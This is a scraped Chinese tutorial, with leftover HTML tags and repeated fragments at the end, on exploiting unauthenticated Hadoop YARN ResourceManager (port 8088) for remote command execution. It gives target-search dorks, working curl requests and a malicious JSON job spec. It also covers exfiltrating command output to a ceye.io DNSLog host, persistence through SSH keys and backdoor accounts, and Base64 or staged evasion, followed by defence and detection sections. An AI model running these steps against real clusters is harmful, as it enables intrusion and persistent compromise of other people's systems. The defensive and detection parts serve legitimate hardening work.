Hadoop命令执行漏洞分析与利用教学文档<\/h1>

一、Hadoop简介<\/h2>

Hadoop是一个由Apache开发的分布式系统基础架构，主要包含两大核心组件：<\/p>

HDFS (Hadoop Distributed File System)<\/strong><\/p>

分布式文件系统<\/li>
高容错性设计<\/li>
可部署在低成本硬件上<\/li>
提供高吞吐量数据访问<\/li> <\/ul> <\/li>

YARN (Yet Another Resource Negotiator)<\/strong><\/p>

Hadoop集群资源管理系统<\/li>
从Hadoop 2引入<\/li>
最初为改善MapReduce实现<\/li>
通用性强，支持多种分布式计算模式<\/li> <\/ul> <\/li> <\/ol>
二、YARN架构与关键组件<\/h2>

ResourceManager (RM)<\/strong><\/p>

集群资源的主要管理者<\/li>
接收客户端请求<\/li>
分配系统资源<\/li> <\/ul> <\/li>

ApplicationMaster (AM)<\/strong><\/p>

每个应用程序独有的进程<\/li>
负责与ResourceManager协商资源<\/li>
与NodeManager协同执行和监控任务<\/li>
周期性发送心跳报告<\/li> <\/ul> <\/li>

NodeManager (NM)<\/strong><\/p>

单个节点上的资源管理者<\/li>
执行具体的任务<\/li> <\/ul> <\/li> <\/ol>
三、漏洞原理<\/h2>
Hadoop YARN的ResourceManager在8088端口接收用户提交的应用程序请求，当服务以ROOT权限运行时，攻击者可以通过构造恶意请求实现远程命令执行。<\/p>
漏洞利用条件：<\/h3>

Hadoop服务以管理员(ROOT)权限运行<\/li>
YARN的ResourceManager Web UI(8088端口)暴露且未配置认证<\/li>
目标系统存在Java环境<\/li> <\/ol>
四、漏洞利用步骤<\/h2>
步骤1：发现目标<\/h3>

搜索语法：title="All Applications"<\/code> 或 port=50070<\/code><\/li>
确认8088端口开放<\/li> <\/ul> 步骤2：申请新的Application ID<\/h3> curl -v -X POST 'http:\/\/target-ip:8088\/ws\/v1\/cluster\/apps\/new-application'<\/span> <\/span><\/span><\/code><\/pre>响应示例：<\/p> { <\/span><\/span> "application-id"<\/span>: "application_123456789_0001"<\/span>, <\/span><\/span> "maximum-resource-capability"<\/span>: { <\/span><\/span> "memory"<\/span>: 8192<\/span>, <\/span><\/span> "vCores"<\/span>: 4<\/span> <\/span><\/span> } <\/span><\/span>} <\/span><\/span><\/code><\/pre>步骤3：构造恶意请求<\/h3> 创建JSON文件(如1.json)，内容如下：<\/p> { <\/span><\/span> "am-container-spec"<\/span>: { <\/span><\/span> "commands"<\/span>: { <\/span><\/span> "command"<\/span>: "echo '111' > \/var\/tmp\/test_1"<\/span> <\/span><\/span> } <\/span><\/span> }, <\/span><\/span> "application-id"<\/span>: "application_123456789_0001"<\/span>, <\/span><\/span> "application-name"<\/span>: "test"<\/span>, <\/span><\/span> "application-type"<\/span>: "YARN"<\/span> <\/span><\/span>} <\/span><\/span><\/code><\/pre>步骤4：提交恶意任务<\/h3> curl -s -i -X POST -H 'Accept: application\/json'<\/span> -H 'Content-Type: application\/json'<\/span> http:\/\/target-ip:8088\/ws\/v1\/cluster\/apps --data-binary @1.json <\/span><\/span><\/code><\/pre>五、高级利用技巧<\/h2> 结果验证<\/strong><\/p> 使用DNSLog或ceye平台验证命令执行<\/li> 示例命令：curl http:\/\/your-subdomain.ceye.io\/$(whoami)<\/code><\/li> <\/ul> <\/li> 持久化访问<\/strong><\/p> 写入SSH公钥到\/home\/user\/.ssh\/authorized_keys<\/code><\/li> 创建后门账户<\/li> <\/ul> <\/li> 绕过限制<\/strong><\/p> 使用Base64编码命令<\/li> 分阶段执行（先下载，后执行）<\/li> <\/ul> <\/li> <\/ol> 六、防御措施<\/h2> 权限控制<\/strong><\/p> 不以ROOT权限运行Hadoop服务<\/li> 配置YARN使用普通用户执行任务<\/li> <\/ul> <\/li> 访问控制<\/strong><\/p> 启用Kerberos认证<\/li> 配置防火墙规则限制访问源<\/li> <\/ul> <\/li> 网络隔离<\/strong><\/p> 将Hadoop管理接口置于内网<\/li> 不直接暴露8088端口到公网<\/li> <\/ul> <\/li> 安全配置<\/strong><\/p> 禁用匿名访问<\/li> 配置YARN的ACL<\/li> <\/ul> <\/li> <\/ol> 七、检测与排查<\/h2> 攻击痕迹检查<\/strong><\/p> 检查YARN的application日志<\/li> 查看\/var\/log\/hadoop-yarn<\/code>目录下的日志文件<\/li> 检查异常进程和文件创建<\/li> <\/ul> <\/li> 命令示例<\/strong><\/p> # 查看YARN应用列表<\/span> <\/span><\/span>yarn application -list <\/span><\/span> <\/span><\/span># 查看特定应用详情<\/span> <\/span><\/span>yarn application -status <Application-ID> <\/span><\/span> <\/span><\/span># 终止可疑应用<\/span> <\/span><\/span>yarn application -kill <Application-ID> <\/span><\/span><\/code><\/pre><\/li> <\/ol> 八、限制因素<\/h2> 服务必须以管理员权限启动才能成功执行命令<\/li> 如果8088端口配置了认证，会返回"user not authenticated"错误<\/li> 在分布式环境中，任务可能被分配到任意节点执行，难以指定特定节点<\/li> <\/ol> 九、参考命令<\/h2> Hadoop Job相关命令<\/h3> 查看Job信息：hadoop job -list<\/code><\/li> 终止Job：hadoop job -kill job_id<\/code><\/li> 查看作业详情：hadoop job -history all output-dir<\/code><\/li> 终止任务：hadoop job -kill-task <task-id><\/code><\/li> 使任务失败：hadoop job -fail-task <task-id><\/code><\/li> <\/ol> YARN通用命令<\/h3> yarn [<\/span>--config confdir]<\/span> COMMAND [<\/span>--loglevel loglevel]<\/span> [<\/span>GENERIC_OPTIONS]<\/span> [<\/span>COMMAND_OPTIONS]<\/span> <\/span><\/span><\/code><\/pre>运行JAR文件<\/h3> yarn jar <jar> [<\/span>mainClass]<\/span> args... <\/span><\/span><\/code><\/pre>

Hadoop命令执行漏洞分析与利用教学文档<\/h1>

三、漏洞原理<\/h2> Hadoop YARN的ResourceManager在8088端口接收用户提交的应用程序请求，当服务以ROOT权限运行时，攻击者可以通过构造恶意请求实现远程命令执行。<\/p>

四、漏洞利用步骤<\/h2>

九、参考命令<\/h2>

运行JAR文件<\/h3> yarn jar <jar> [<\/span>mainClass]<\/span> args... <\/span><\/span><\/code><\/pre>

三、漏洞原理<\/h2>
Hadoop YARN的ResourceManager在8088端口接收用户提交的应用程序请求，当服务以ROOT权限运行时，攻击者可以通过构造恶意请求实现远程命令执行。<\/p>

运行JAR文件<\/h3>
`yarn jar <jar> [<\/span>mainClass]<\/span> args... <\/span><\/span><\/code><\/pre>`